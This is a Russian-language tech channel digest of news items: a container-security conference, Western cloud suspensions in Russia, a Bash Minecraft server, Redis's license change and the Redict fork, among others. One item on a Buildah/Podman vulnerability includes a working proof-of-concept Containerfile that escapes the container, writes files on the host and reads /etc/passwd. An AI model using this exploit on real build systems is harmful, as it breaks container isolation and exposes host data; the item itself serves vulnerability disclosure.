Мы живем в обществе

https://gitlab.freedesktop.org/mesa/mesa/-/issues/10803

Спасибо подписчику за ссылку

5 июня 2024 в Москве будет проходить второй раз БЕКОН - bekon.luntry.ru

Цель мероприятия – помочь компаниям перейти на новый уровень понимания контейнерной безопасности и адаптировать современные подходы по ее обеспечению.

В 2023 году мероприятие собрало множество положительных отзывов от участников, среди которых были архитекторы, инфраструктурные и платформенные команды, DevOps/DevSecOps, специалисты и руководители ИБ-департаментов. Подробнее – в обзоре.

Программа на 2024 год уже начала формироваться и в списке есть доклады

- Почему защитой k8s должно заниматься целое подразделение? / Артем Мерец, Tinkoff
- Linux user namespace в чертогах Kubernetes / Дмитрий Евдокимов, Luntry
- Мечтают ли антивирусы о docker-образах? / Владимир Капистка, samokat.tech
- Мультитенантность в Kubernetes: есть ли серебряная пуля? / Константин Аксенов, Флант

Посмотреть актуальную программу, приобрести билет или предложить идею для сотрудничества можно на официальном сайте конференции.

Билеты со скидкой можно купить до 14 марта включительно.

Я тоже планирую быть там, возможно, с докладом 🌝

You are here:
TypeScript + SQL-based OPERATING SYSTEM by Mike Stonebraker

https://www.dbos.dev/blog/announcing-dbos

F

От лица ГК Softline мы подтверждаем получение официальной информации от Microsoft и Amazon о приостановлении с 20 марта 2024 г. доступа к облачным продуктам на территории России. В связи с этим ГК Softline предупреждает о возможных функциональных ограничениях в работе облачных продуктов и сервисов Microsoft, Amazon и Google. Согласно письмам от правообладателей, с указанной даты будет прекращен доступ к облачным продуктам, таким как (включая, но не ограничиваясь): Power BI, Dynamics CRM и другие. Мы ожидаем, что приостановка также затронет облачные решения, содержащие эти продукты.

Эти ограничения в отношении России определены так называемым «12 пакетом санкций Европейского союза» от 19 декабря 2023 года, который ограничивает поставку в Россию программного обеспечения для бизнес-аналитики (business intelligence (BI), Customer Relationship Management (CRM) и других продуктов.

Для российских компаний это означает, что воспользоваться этими продуктами или получить доступ к данным, содержащимся в них, с 20 марта 2024 г. будет невозможно. Согласно письмам от правообладателей, данные продукты станут недоступны для российских клиентов в связи с требованиями новых положений Регламента ЕС 833/2014, который вводит ограничения на поставку в Россию различных видов программного обеспечения. Важно отметить, что речь может идти о всех облачных продуктах Microsoft, Amazon и Google, которые правообладатели определят в качестве запрещенных для поставки в РФ согласно требованиям указанного выше Регламента.

Чтобы избежать полной или частичной потери информации, ГК Softline рекомендует всем компаниям в кратчайшие сроки выполнить резервное копирование данных, связанных со всеми облачными продуктами Microsoft, Amazon и Google.

https://softline.ru/about/news/priostanovka-dostupa-k-oblachnym-produktam-inostrannykh-vendorov-dlya-zakazchikov-iz-rossii

Пятница!

> The conversion is still quite slow (it takes ~10ms on my Xeon E5-2680v2), but this is to be expected with bash scripts. For a cheap comparsion, the old version took around 350ms, but I don't have solid measurements to prove that. still, 35x faster, woo!

My thoughts on writing a Minecraft server from scratch (in Bash)
https://sdomi.pl/weblog/15-witchcraft-minecraft-server-in-bash/

🫡

- Bash is notoriously bad at handling decimal numbers. It's *ok* with Integers (as long as you don't do too advanced maths on them), but the only way to handle a decimal number is by multiplying it on input, and somehow placing a dot in the correct place for output. Because of this, most (if not all?) numbers handled by Witchcraft are ints.

- The multiplayer doesn't really work? I mean, it kinda does, but I never really took time to finish it and polish it up.

- Witchcraft is technically a multi-threaded server!

- ... which means that it has to use terrible hacks to communicate between threads. Currently, most global data is stored under /dev/shm/witchcraft, internally referenced to as $TEMP.

- Witchcraft is slow, especially in terms of data exchange between multiple threads. Don't expect to be able to send massive amounts of data, generating and sending 16 solid chunks can take as long as a second.

- Witchcraft currently runs *only* if you have the latest BusyBox (1.35.0) installed. I haven't tested it with GNU coreutils, but I expect it won't work.

+
Witchcraft - a Minecraft server, written in Bash
https://git.sakamoto.pl/domi/Witchcraft/

Выводы, которые сделал OpenEBS, после того, как CNCF их передвинула в архивные проекты

Lesson 1: Understand the Purpose Behind Open Source
. . .
DataCore has 20 engineers working full-time on the OpenEBS project, contributing 90% of the code. What do we do? Do we rush to monetize it? Is investing in the Kubernetes community enough? How do we measure the benefit? For us, we didn’t know.
. . .
Lesson 2: Be True to Who You Are
. . .
One of the challenges with open source is that “commercialization” is a dirty word. One of the challenges with proprietary software is that “open source” is a dirty phrase. As a community, we need to get past this.
. . .
Lesson 3: Life after Archival
. . .
When people using an open source project invest years of their lives and base their own software on an open source project, they are depending on it and need to know it will continue. A CNCF sandbox, incubating or graduated project provides this certainty. An archived project does not.

Полностью тут

OpenEBS: Lessons We Learned from Open Source
https://thenewstack.io/openebs-lessons-we-learned-from-open-source/

Список проектов CNCF, которые уехали в архивные доступен тут
https://www.cncf.io/archived-projects/

По данным докладчика последнее время наблюдается активное внедрение GnuCOBOL коммерческими компаниями и банками, которые переводят написанные на COBOL бэкенды на GnuCOBOL с проприетарного компилятора Micro Focus. Отмечается, что переход на GnuCOBOL позволяет добиться повышения производительности и избавиться от привязки к одному поставщику. Например, Министерство финансов Франции недавно заменило мэйнфрейм, на котором использовалась операционная система GCOS, на решение основанное на GnuCOBOL.

Компилятор GnuCOBOL достиг зрелости. Первый выпуск среды разработки SuperBOL
https://www.opennet.ru/opennews/art.shtml?num=60802


Отрывок видео вырезал отсюда

Реальный DevOps в энтерпрайзе / Александр Тараторин (Райффайзенбанк)
https://www.youtube.com/watch?v=8a8BRrgEL6c

Уязвимость вызвана тем, что при выполнении монтирования частей ФС через команду "mount --bind" во время сборки на стадии RUN, аргумент с исходным каталогом (параметр "source=") не проверяется на предмет существования в корневой ФС. Оформленный злоумышленником файл конфигурации Containerfile может использовать образ контейнера, в котором исходный каталог для монтирования оформлен в виде символической ссылки на корневую ФС. В этом случае операция монтирование приведёт к монтированию внутрь контейнера корневой ФС хост-окружения, что позволит на стадии RUN получить полный доступ к файловой системе хост-окружния и организовать выход из контейнера во время сборки командами "buildah build" или "podman build".

Уязвимость в Buildah и Podman, позволяющая обойти изоляцию контейнера
https://www.opennet.ru/opennews/art.shtml?num=60805

Пример такого файла

FROM alpine as base
   
RUN ln -s / /rootdir
RUN ln -s /etc /etc2

FROM alpine

RUN echo "ls container root"
RUN ls -l /

RUN echo "With exploit show host root, not the container's root, and create /BIND_BREAKOUT in / on the host"
RUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit

RUN echo "With exploit show host /etc/passwd, not the container's, and create /BIND_BREAKOUT2 in /etc on the host"
RUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2 

Я напомню, что у нас есть уютный чатик @ru_podman, где мы как раз обсуждаем все эти Podman'ы и Buildah'и

🫡

Компания Redis Ltd объявила об изменении лицензии на СУБД Redis, относящейся к классу NoSQL-систем. Начиная с выпуска Redis 7.4 код проекта будет распространяться под двумя проприетарными лицензиями RSALv2 (Redis Source Available License v2) и SSPLv1 (Server Side Public License v1), вместо ранее применявшейся лицензии BSD. Ранее под проприетарной лицензией поставлялся только код дополнительных модулей, в которых предлагались расширенные возможности для корпоративных пользователей (RediSearch, RedisGraph, RedisJSON, RedisML, RedisBloom и т.п.). Отныне проприетарная лицензия будет применяться и к основной кодовой базе СУБД.
. . .
Лицензии SSPL и RSAL не являются открытыми и вносят дополнительные ограничения, запрещающие бесплатное использование продукта для обеспечения работы облачных сервисов. По своим целям обе лицензии походят друг на друга, а отличия сводится к тому, что лицензия SSPL основана на копилефт лицензии AGPLv3, а лицензия RSAL основана на пермиссивной лицензии BSD.

Лицензия RSAL позволяет использовать, изменять, распространять и интегрировать код в приложения, за исключением случаев, когда эти приложения является коммерческими или используются для предоставления управляемых платных сервисов (для внутренних сервисов допускается бесплатное использование, ограничение касается только платных сервисов, предоставляющих доступ к Redis). В соответствии с принципами копилефта лицензия SSPL содержит требование поставки под той же лицензией не только кода самого приложения, но и исходных текстов всех компонентов, вовлечённых в предоставление облачного сервиса.

В качестве причины изменения лицензионной политики отмечается желание не допустить паразитирования провайдеров облачных сервисов на открытом ПО. Компанию Redis Inc не устраивает то, что облачные провайдеры создают производные коммерческие продукты и занимаются перепродажей Redis в виде облачных сервисов, но не принимают участия в жизни сообщества и не помогают в разработке. Создаётся ситуация когда выгоду получают ничем не связанные с проектом облачные провайдеры, перепродающие готовые открытые решения, а непосредственно разработчики остаются ни с чем.

СУБД Redis переходит на проприетарную лицензию. Обсуждение удаления Redis из Fedora
https://www.opennet.ru/opennews/art.shtml?num=60820

#prog #article

Text Buffer Reimplementation

Статья про основную структуру данных в текстовом редакторе VSCode (от 23 марта 2024 года, поэтому некоторые детали могут быть неактуальны). До внесения изменений в редакторе использовался line buffer (массив строк), который, понятное дело, имел печальную производительность на больших файлах.

Новая структура данных, основанная на piece table, получилась значительно быстрее старой на большинстве реалистичных юзкейсов. Трюки вполне ожидаемые: по возможности плоские данные, использование индексов вместо реальной конкатенации, использование сбалансированных двоичных деревьев для понижения сложности операций с линейной до логарифмической.

Интересно, что новая реализация написана целиком на Typescript. Как пишет автор:

Why not native?

I promised at the beginning that I would get back to this question.

TL;DR: We tried. It didn't work out for us.

Выгоды от возможной реализации текстового буфера в нативном коде перекрывались высокой стоимостью вызовов с переходом через границу FFI. Потенциальное спользование наивных строк осложнялось тем, что это означало бы завязку на детали реализации JS-движка, а конкретно у V8 эти внутренние строковые типы ещё и не потокобезопасны.

Форк основал Дрю ДеВолт (Drew DeVault), автор пользовательского окружения Sway, языка программирования Hare, почтового клиента Aerc и платформы совместной разработки SourceHut. К работе над форком присоединился Хельвенн Моннье (Haelwenn Monnier), автор браузера BadWolf (на базе WebKitGTK) и платформы Pleroma для развёртывания федеративных социальных сетей.

Лицензия на код Redict изменена с BSD на GPLv3 (старый код остался под лицензией BSD, но все новые изменения в Redict будут вноситься под лицензией GPLv3). Таким образом проект Redict сможет переносить исправления, публикуемые компанией Redis Inc для старых версий Redis под лицензией BSD, но исправления и изменения, созданные для Redict под лицензией GPLv3, не получится перенести в Redis. Проект также не будет требовать от разработчиков подписания соглашения о передаче имущественных прав на код, что в случае намерения изменить лицензию в будущем потребует согласования данного шага с каждым из разработчиков.

Основан проект Redict, который будет развивать форк СУБД Redis
https://www.opennet.ru/opennews/art.shtml?num=60823
+
https://codeberg.org/redict/redict